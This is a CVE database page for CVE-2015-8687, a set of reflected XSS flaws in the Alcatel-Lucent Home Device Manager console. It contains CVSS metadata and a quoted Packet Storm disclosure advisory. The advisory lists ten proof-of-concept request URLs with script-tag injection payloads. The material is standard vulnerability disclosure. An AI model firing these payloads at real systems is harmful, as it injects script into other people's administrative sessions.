Search...

CVE-2015-8687

2017-03-23T20:59:00

ID CVE-2015-8687
Type cve
Reporter cve@mitre.org
Modified 2017-03-28T13:47:00

Description

Multiple cross-site scripting (XSS) vulnerabilities in the Management Console in Alcatel-Lucent Motive Home Device Manager (HDM) before 4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceTypeID parameter to DeviceType/getDeviceType.do; the (2) policyActionClass or (3) policyActionName parameter to PolicyAction/findPolicyActions.do; the deviceID parameter to (4) SingleDeviceMgmt/getDevice.do or (5) device/editDevice.do; the operation parameter to (6) ajax.do or (7) xmlHttp.do; or the (8) policyAction, (9) policyClass, or (10) policyName parameter to policy/findPolicies.do.

JSON Vulners Source

Initial Source

{"id": "CVE-2015-8687", "bulletinFamily": "NVD", "title": "CVE-2015-8687", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the Management Console in Alcatel-Lucent Motive Home Device Manager (HDM) before 4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceTypeID parameter to DeviceType/getDeviceType.do; the (2) policyActionClass or (3) policyActionName parameter to PolicyAction/findPolicyActions.do; the deviceID parameter to (4) SingleDeviceMgmt/getDevice.do or (5) device/editDevice.do; the operation parameter to (6) ajax.do or (7) xmlHttp.do; or the (8) policyAction, (9) policyClass, or (10) policyName parameter to policy/findPolicies.do.", "published": "2017-03-23T20:59:00", "modified": "2017-03-28T13:47:00", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8687", "reporter": "cve@mitre.org", "references": ["http://seclists.org/fulldisclosure/2016/Jan/0"], "cvelist": ["CVE-2015-8687"], "type": "cve", "lastseen": "2020-12-09T20:03:09", "edition": 5, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:135133"]}], "modified": "2020-12-09T20:03:09", "rev": 2}, "score": {"value": 3.9, "vector": "NONE", "modified": "2020-12-09T20:03:09", "rev": 2}, "vulnersScore": 3.9}, "cpe": ["cpe:/a:alcatel-lucent:motive_home_device_manager:4.1.10.5"], "affectedSoftware": [{"cpeName": "alcatel-lucent:motive_home_device_manager", "name": "alcatel-lucent motive home device manager", "operator": "le", "version": "4.1.10.5"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "cpe23": ["cpe:2.3:a:alcatel-lucent:motive_home_device_manager:4.1.10.5:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:alcatel-lucent:motive_home_device_manager:4.1.10.5:*:*:*:*:*:*:*", "versionEndIncluding": "4.1.10.5", "vulnerable": true}], "operator": "OR"}]}}

{"packetstorm": [{"lastseen": "2016-12-05T22:24:29", "description": "", "published": "2016-01-05T00:00:00", "type": "packetstorm", "title": "Alcatel Lucent Home Device Manager Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8687"], "modified": "2016-01-05T00:00:00", "id": "PACKETSTORM:135133", "href": "https://packetstormsecurity.com/files/135133/Alcatel-Lucent-Home-Device-Manager-Cross-Site-Scripting.html", "sourceData": "`Document Title: \n=============== \nAlcatel Lucent Home Device Manager - Management Console Multiple XSS \n \nCVE-Number: \n=========== \nCVE-2015-8687 \n \nRelease Date: \n============= \n03 Jan 2016 \n \nAbstract Advisory Information: \n============================= \nUgur Cihan Koc discovered ten Reflected XSS \nvulnerabilities Alcatel Lucent Home Device Manager - Management Console \n \nVulnerability Disclosure Timeline: \n================================== \n10 Dec 2015 Bug reported to the vendor. \n10 Dec 2015 Vendor returned ; investigating \n16 Dec 2015 Vendor has validated the issues & fixed \n27 Dec 2015 CVE number assigned \n03 Jan 2016 Disclosured \n \nAffected Product(s): \n==================== \nAlcatel Lucent Home Device Manager - Management Console 4.1.10.5 \nmay be old version could be affected \n \nExploitation Technique: \n======================= \nLocal, Authenticated \n \nSeverity Level: \n=============== \nHigh \n \nTechnical Details & Description: \n================================ \n\u00d8 Sample Payload : 42f8b36<script>alert(1)<%2fscript>152b4 \n \n\u00d8 Affected Path/Parameter: [10 parameter] \n \n1. /hdm/DeviceType/getDeviceType.do [deviceTypeID parameter] \no \nhttp://10.240.71.198:7003/hdm/DeviceType/getDeviceType.do?deviceTypeID=42f8b36 \n<script>alert(1)<%2fscript>152b4 \n \n2. /hdm/PolicyAction/findPolicyActions.do [policyActionClass parameter] \no \nhttp://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=&policyActionClass=c9e31 \n\"><script>alert(1)<%2fscript>3bd174ff207&policyActionFunction=0 \n \n3. /hdm/PolicyAction/findPolicyActions.do [policyActionName parameter] \no \nhttp://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=553a3 \n\"><script>alert(1)<%2fscript>721d335792b&policyActionClass=&policyActionFunction=0 \n \n4. /hdm/SingleDeviceMgmt/getDevice.do [deviceID parameter] \no \nhttp://10.240.71.198:7003/hdm/SingleDeviceMgmt/getDevice.do?deviceID=8001a1a0b \n<script>alert(1)<%2fscript>1a032 \n \n5. /hdm/ajax.do [operation parameter] \no http://10.240.71.198:7003/hdm/ajax.do?operation=getDeviceById0fa81 \n<script>alert(1)<%2fscript>238957ca4e0&deviceId=8001 \n \n6. /hdm/device/editDevice.do [deviceID parameter] \no http://10.240.71.198:7003/hdm/device/editDevice.do?deviceID=8001c94e5 \n<script>alert(1)<%2fscript>45f4a \n \n7. /hdm/policy/findPolicies.do [policyAction parameter] \no \nhttp://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=19f01 \n\"><script>alert(1)<%2fscript>b37ee8333eb&policyClass=&policyStatus=&trigger=trigger_all \n \n8. /hdm/policy/findPolicies.do [policyClass parameter] \no \nhttp://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=&policyClass=c77cb \n\"><script>alert(1)<%2fscript>5ddc63ced2e&policyStatus=&trigger=trigger_all \n \n9. /hdm/policy/findPolicies.do [policyName parameter] \no \nhttp://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=654dd \n\"><script>alert(1)<%2fscript>5b8329ee237&policyAction=&policyClass=&policyStatus=&trigger=trigger_all \n \n10. /hdm/xmlHttp.do [operation parameter] \no \nhttp://10.240.71.198:7003/hdm/xmlHttp.do?operation=getQueuedActionsd4b0c \n<script>alert(1)<%2fscript>217f045ae1f&deviceID=8001 \n \n \n \nProof of Concept (PoC): \n======================= \nPOC Video; \nhttps://drive.google.com/file/d/0B-LWHbwdK3P9Y3UyZnFmZjJqa1U/view?usp=sharing \n \nSolution Fix & Patch: \n==================== \nFixed version of 4.2 \n \nSecurity Risk: \n============== \nThe risk of the vulnerability above estimated as high. \n \nCredits & Authors: \n================== \nUgur Cihan Koc(@_uceka_) \nBlog: www.uceka.com \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/135133/alcatellucenthdm-xss.txt"}]}